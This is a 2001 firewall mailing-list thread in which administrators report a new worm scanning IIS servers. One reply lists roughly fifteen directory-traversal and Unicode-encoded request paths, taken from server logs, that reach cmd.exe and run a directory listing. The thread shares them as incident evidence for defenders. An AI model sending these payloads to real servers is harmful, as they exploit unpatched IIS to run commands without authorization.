RE: something new afoot, sweeping scans:

[C. Russell Goulding]

Have something strange here as well.  Infected an NT4 workstation/IIS4.
Uses TFTP.EXE for outward scans and placed 1k of empty files in /scripts.

Russ Goulding
Systems Administrator
Quick Delivery Service, Inc.

-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]On Behalf Of Jose Nazario
Sent: Tuesday, September 18, 2001 12:28 PM
To: Luke Butcher
Cc: [EMAIL PROTECTED]
Subject: RE: something new afoot, sweeping scans:


On Tue, 18 Sep 2001, Luke Butcher wrote:

> Seeing hits from this new worm, looks like it tries circa 30 URLs.
> Logic looks similar to Code Red II/III, in that most hits are coming
> from similar class B and C networks.

its a huge shitstorm here. shuttig us down all morning as our firewall
connection tables are flooded. massive traffic floods ... the whole 9
yards.

here's the payloads culled from an apache server:

/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+C:%5C
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir


hope that helps.

____________________________
jose nazario                                                 [EMAIL PROTECTED]
                     PGP: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
                                       PGP key ID 0xFD37F4E5 (pgp.mit.edu)

_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls


_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls